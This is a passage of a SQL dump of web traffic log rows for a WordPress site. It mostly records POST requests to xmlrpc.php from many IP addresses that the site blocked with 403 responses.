Safari\\/537.36\"}','EarXNCvLHk6Kis24gZdJYzn1',0,1680726210.9734,552,'','POST',403,0,515,0,1,'',0),('137.63.71.51',2302625587,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','q1y9hiURvoJtPlbQMeYSpmjG',0,1680726474.0662,3460,'','POST',403,0,515,0,1,'',0),('213.152.161.165',3583549861,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2SCx70IfEodOhZlPDWXuynAR',0,1680726715.5310,781,'','POST',403,0,515,0,1,'',0),('184.75.223.219',3091980251,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eCpU3qy7lAWMDwTjNB94VEfH',0,1680726959.7179,3188,'','POST',403,0,515,0,1,'',0),('82.102.23.131',1382422403,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KlBCFPXsLabRqzui0fOWT8ce',0,1680729192.3967,751,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','CGdzSrc15VgNUfmliEeoLBqZ',0,1680730394.9059,3843,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','DMOIsT4g3XVj7ZwpASCJ8L51',0,1680730398.0425,1181,'','POST',403,0,515,0,1,'',0),('190.104.235.180',3194547124,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','t8Zb2mLwdvl3CnPfXQU9gYqV',0,1680730404.6170,563,'','POST',403,0,515,0,1,'',0),('75.129.92.62',1266768958,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','JHX3t7AzSIy10lNZPOkUDK4o',0,1680730409.0082,955,'','POST',403,0,515,0,1,'',0),('157.245.152.250',2650118394,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','tMhZUrsFvmRGPYepcd8SknwI',0,1680730409.4845,880,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','DgARuKmbelvIzoYF4PNqhHC2',0,1680730423.0615,533,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','f3PB0Y8vWdS2Nr1hOjMetwaC',0,1680730428.7173,557,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','FaVNy6D5PcJrjvn8UM4dR3iE',0,1680730431.4639,573,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','Oyqplfj23e9ugYm5GKSBPRWZ',0,1680730442.9497,639,'','POST',403,0,515,0,1,'',0),('213.152.187.215',3583556567,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','I6ZYyQAXqkeiLVcpOMFvrCgD',0,1680730809.8055,1722,'','POST',403,0,515,0,1,'',0),('62.102.148.189',1046910141,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','aceSTmkBZMqpwUourK1DPE0i',0,1680731844.7035,3929,'','POST',403,0,515,0,1,'',0),('146.70.76.43',2454080555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3lNjERM5th6QWqXIY9DcfdCG',0,1680733871.9151,3960,'','POST',403,0,515,0,1,'',0),('217.138.252.123',3649764475,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5XiAZa609z4I27wcr1b3LvgP',0,1680734242.4243,3652,'','POST',403,0,515,0,1,'',0),('146.70.76.43',2454080555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Z9p4WJgQSybtMLr5ARFoXKPY',0,1680734409.1026,3538,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','XQACTpf9Ynjue63LscZOhPKH',0,1680734700.6192,1946,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','3K0dY9lfhmLOze7GTJwaQ1S8',0,1680734699.4365,3730,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','UIptX8dJM9Nmn3SwCFOrB2sY',0,1680734703.5766,955,'','POST',403,0,515,0,1,'',0),('43.143.239.49',730853169,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','4bcY6FBL1tSHsoM0qXDWGmf3',0,1680734712.7465,2258,'','POST',403,0,515,0,1,'',0),('107.167.244.51',1806169139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','I02kiaxt8PUGOMTmKVqhbYuz',0,1680735285.1121,725,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','eNlLXVDYPAoB3IwtMEW0qSs8',0,1680735447.2816,1292,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','2VvJX6EAItkxUPiKlT843aHu',0,1680735449.0090,537,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','8yXiMEoSjQg2RY7l63azTF5V',0,1680735453.6251,559,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','d3qWbjk79oOJfRcKvtisZN2Y',0,1680735455.3373,576,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','0L4G8KtSwBNsbRX39mDdZhjC',0,1680735457.3509,560,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','eyPn6MDIKvOcop4wsGHNxRCE',0,1680735461.1869,1188,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','cyX76YM9PQbhAqN5jwxGFuSW',0,1680735461.7432,983,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','vXHMx7KN9eVU8bEIGua26s1o',0,1680735465.9324,593,'','POST',403,0,515,0,1,'',0),('156.224.21.75',2631931211,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','Ak723hVwd9Eo5XsCq1x6MBiu',0,1680735470.4283,558,'','POST',403,0,515,0,1,'',0),('138.68.45.151',2319723927,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','4Q2FwPns5GJE3YxSDXtmuAeK',0,1680735476.1789,565,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','4gDu6PhYQRi7K3aVOSyfn2Hj',0,1680735478.1031,545,'','POST',403,0,515,0,1,'',0),('135.181.176.112',2276831344,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N9XfK2sQELCUSkPHbGaq6FW5',0,1680735482.9661,2099,'','POST',403,0,515,0,1,'',0),('31.170.22.49',531240497,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','3VrwNuL1MFgjmR6WD5kHZBIh',0,1680735482.9754,2097,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','UsxJW57oj6HRESrfktM13qNP',0,1680735483.4584,1869,'','POST',403,0,515,0,1,'',0),('140.174.6.37',2360215077,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','LWnwf9r6mRHEOsgFxkdJzVvb',0,1680735485.6099,588,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','pnDvzWQkulePaYNr7KZ6jA3o',0,1680735491.5561,565,'','POST',403,0,515,0,1,'',0),('185.232.250.86',3119053398,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','BoziZs3HcClORxIh60GbmJja',0,1680735495.6948,557,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','lo9NhE1cngPzOrJCQupfiZLY',0,1680735503.8034,570,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','7o5cgB1ykQHXYqPrDpnzwtJF',0,1680735509.6019,547,'','POST',403,0,515,0,1,'',0),('2.58.47.203',37367755,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KcvJf1Te2EWglFhNtd4U0pHk',0,1680738546.2407,3856,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','xY7fjW2UQE6bDLHeuJhMkc4Z',0,1680738830.1697,3781,'','POST',403,0,515,0,1,'',0),('140.174.6.37',2360215077,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','alZyft4mdk17xucN8h9pM0HY',0,1680738836.3686,600,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','l69QA4vd3jIVZtwa18OuWfhx',0,1680738846.7411,1610,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','z03IDtuiwvYaxC9h48kA1EJU',0,1680738848.4624,1500,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','Lhx2Dt7BIgi9Sb50p8mvMn4R',0,1680738849.9434,1228,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','tW9A26kfZcJ14RV7TIxQsvYB',0,1680738851.8278,575,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','yHnZmPq7LWwb8Mtof3hK69ju',0,1680738861.2535,551,'','POST',403,0,515,0,1,'',0),('114.132.219.217',1921309657,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','SKTZvQew0sqNVUr8R5JLDMaW',0,1680738876.9105,578,'','POST',403,0,515,0,1,'',0),('121.196.63.97',2042904417,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','vJpco4S6Hyzab02sh7PFqVTB',0,1680738885.3526,1086,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','IwMr0zd7qFZDNy3oTJiGEeCu',0,1680738885.7503,999,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','LkRPV6aGFmDqdnTgJ0YcBUpC',0,1680738993.9171,1343,'','POST',403,0,515,0,1,'',0),('154.26.136.48',2585430064,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','dkEotWx3zjahGTqVrJM9Y2im',0,1680738996.0052,937,'','POST',403,0,515,0,1,'',0),('54.249.226.226',922346210,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','XtTKfL6Y1eVdzxGsEyRj5il3',0,1680738996.4751,857,'','POST',403,0,515,0,1,'',0),('68.178.224.199',1152573639,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','5ieEhdSXo09R8q2TtBmaP1ln',0,1680738999.5533,572,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','cBungK0wGhIESWJ7AmF3V9DU',0,1680739005.6510,1101,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Mgt8HVWlnmJZPjisbQh5kxcR',0,1680739006.1521,970,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','0Akuq8SQEFvY9ztTMXp6oiIj',0,1680739011.4352,586,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','c7wELZ1hudFbTWfUPJYyQaHO',0,1680739013.1505,698,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','OM4Tvlaw2UhxqC6byA1Qm9EB',0,1680739013.8592,614,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','7jqZLXfSF6T04xA3gYDCVc8M',0,1680739026.8353,556,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','l7kewsYJbZrDFSG1gaoqUpNz',0,1680739028.2717,594,'','POST',403,0,515,0,1,'',0),('152.89.160.131',2556010627,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gcj0iwrE7CKueVFTnNzBPRx9',0,1680740584.1093,4345,'','POST',403,0,515,0,1,'',0),('194.187.251.163',3267099555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ONZijmsvxnQyT92w674KSczd',0,1680741079.8470,3433,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/?action=logout&_wpnonce=5ceaa36859','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/edit.php?post_type=page\"}','jGp2gUPqZcJ6yEkz18CIK0VL',3,1680742453.2784,1030,'','GET',302,0,600,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?loggedout=true\"}','fSGcqH6JLgh4nEvmytO8Feli',3,1680742478.1402,373,'','POST',302,0,600,0,1,'',510),('184.168.103.90',3098044250,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','erFyV9z3OaDoidcXHE0J6gtx',0,1680743459.2159,1617,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','tGZ1CgfyWV6T43JsupqdnEQO',0,1680743464.3493,576,'','POST',403,0,515,0,1,'',0),('122.114.158.225',2054332129,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','VIKmCE9sTbkJlNQ7Z6chMRSA',0,1680743465.8462,600,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','CKQPreMYBLFcGopRljXH1aN9',0,1680743473.1518,568,'','POST',403,0,515,0,1,'',0),('122.114.158.225',2054332129,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','U7ohI0prZu9b4N2ijc1ngx3P',0,1680743478.5779,535,'','POST',403,0,515,0,1,'',0),('91.219.122.50',1541110322,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','Qc42Wvb5NAIoazKsYM6jTi8e',0,1680743481.6038,544,'','POST',403,0,515,0,1,'',0),('185.179.82.133',3115537029,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','ih6e4VRobcuKW91EayrIPSq0',0,1680743486.9402,600,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','8sdJ4LDzPRSFNcAHqZp1XTKr',0,1680743491.9728,590,'','POST',403,0,515,0,1,'',0),('103.138.150.26',1737135642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','dufaxg5L9SIFstbG4EJYZjBQ',0,1680743497.5141,657,'','POST',403,0,515,0,1,'',0),('62.102.148.130',1046910082,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OCg1oXGxRSuMJjzwW6yTYpFQ',0,1680743840.7617,706,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','QrZIMGWlRvaobHTyDJXh6dEB',0,1680745483.8785,677,'','POST',403,0,515,0,1,'',0),('92.204.55.166',1556887462,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','PZelxL7fEQTOMmYw0XJzAvcU',0,1680745491.2782,1360,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','laAfgwbiTqxsEhHn9VN2td1Y',0,1680745494.7845,564,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 